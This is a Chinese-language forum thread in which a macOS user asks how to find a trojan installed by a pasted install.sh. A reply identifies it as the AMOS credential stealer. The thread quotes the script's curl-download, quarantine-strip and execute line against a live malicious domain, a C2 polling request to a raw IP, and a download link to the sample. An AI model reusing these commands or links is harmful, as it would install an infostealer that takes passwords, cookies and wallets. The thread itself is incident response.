V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
• 请不要在回答技术问题时复制粘贴 AI 生成的内容
Toadair
V2EX  ›  程序员

macos 中了 MAC/Agent.FD!tr.pws 木马,如何能揪出木马隐藏在哪里?

  •  
  •   Toadair · 16 小时 36 分钟前 · 386 次点击

    最开始执行的文件是 install.sh ,内容如下

    #!/bin/bash
    
    curl -o /tmp/update https://dicoduweb.com/get15/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update
    

    通过在线网站检测出该 update 带有 MAC/Agent.FD!tr.pws 木马

    监测网络后发现有一段 curl 不断运行如下指令,目前已禁用 curl 联网,通过浏览器访问下面连接请求头和响应都未能看出异常

    curl -s http://45.94.47.149/api/tasks/vkBpuD+zjorGFc1q1N1a2g==
    

    寻求大佬支支招,如何能找到这个隐藏到系统里的木马呢,使用了 Malwarebytes 扫描未查到任何异常,上面的 curl 仅一闪而过,未能看到调用 curl 的父进程

    木马文件如下 https://www.ilanzou.com/s/jqBNx0xb?code=52pj

    petercui
        1
    petercui  
       13 小时 40 分钟前
    这应该是个心跳检测的 API ,说是木马有点勉强吧。
    Toadair
        2
    Toadair  
    OP
       11 小时 52 分钟前
    @petercui #1 那么关键来了,什么程序会异常调用去做心跳检测,实际更像是电脑上的程序访问这个连接返回 pong ,表达在线
    AkaGhost
        3
    AkaGhost  
       6 小时 39 分钟前   ❤️ 1
    @petercui 手动破坏一下 tasks/xxx 后面的 ID 串,服务器返回了一个 `Bad botid` 响应,感觉是 C2 服务器。

    给定的 `https://dicoduweb.com/get15/update` 伪装了 404 错误,实际上只有 curl 的 User-Agent 才返回 payload 。我这里卡巴斯基已经报毒了:

    ```
    事件: 下载被拒绝
    用户: BEELZEBUL\ghost
    用户类型: 发起者
    应用程序名称: curl.exe
    应用程序路径: C:\Program Files\Git\mingw64\bin
    组件: 安全浏览
    结果描述: 已阻止
    类型: 木马
    名称: HEUR:Trojan-PSW.OSX.Amos.ba
    精确度: 启发式分析
    威胁级别: 高
    对象类型: 文件
    对象名称: arch1
    对象路径: https://dicoduweb.com/get15/update//
    对象的 MD5: 00CAC0E5943AD7AA4073462D8498D1A9
    原因: 专家分析
    数据库发布日期: 昨天,2025/9/28 23:22:00
    ```

    VirusTotal 上已经有人上传过样本了: https://www.virustotal.com/gui/file/143174d17e1e2f05e957e63ef6a8b4a6ac77165bad70c45ccb0dcd2ca39375f8 不知道是不是楼主上传的,2 小时前 (相对 9/29 0:48)。

    微步沙箱我刚刚也上传了: https://s.threatbook.com/report/file/143174d17e1e2f05e957e63ef6a8b4a6ac77165bad70c45ccb0dcd2ca39375f8

    行为带有虚拟机检测,明摆着检测 QEMU 。


    Google 一下,这个家族已经活跃了有多时间了: https://www.google.com/search?q=amos%2Finfostl

    这里有个详细的分析: https://www.trendmicro.com/en_gb/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html

    主要目标是:

    * 系统配置文件信息
    * 用户名和密码
    * 主要各类浏览器的相关数据(包括 Cookies 等)
    * 加密钱包数据
    * Telegram 会话数据
    * OpenVPN 配置文件
    * 钥匙串数据
    * Apple Notes 数据
    * 来自桌面、文档、下载文件夹和其它位置的个人文档( txt, pdf, docx, json, db, wallet, key )

    其它感染过程和具体行为 OP 请自行查看分析文章。


    ---

    事到如今就别想着移除,直接抹了系统重装吧。密码什么的也该改改吧。顺带一提这个样本很多杀毒软件的引擎都没能检出来……
    关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1220 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 22ms · UTC 23:39 · PVG 07:39 · LAX 16:39 · JFK 19:39
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.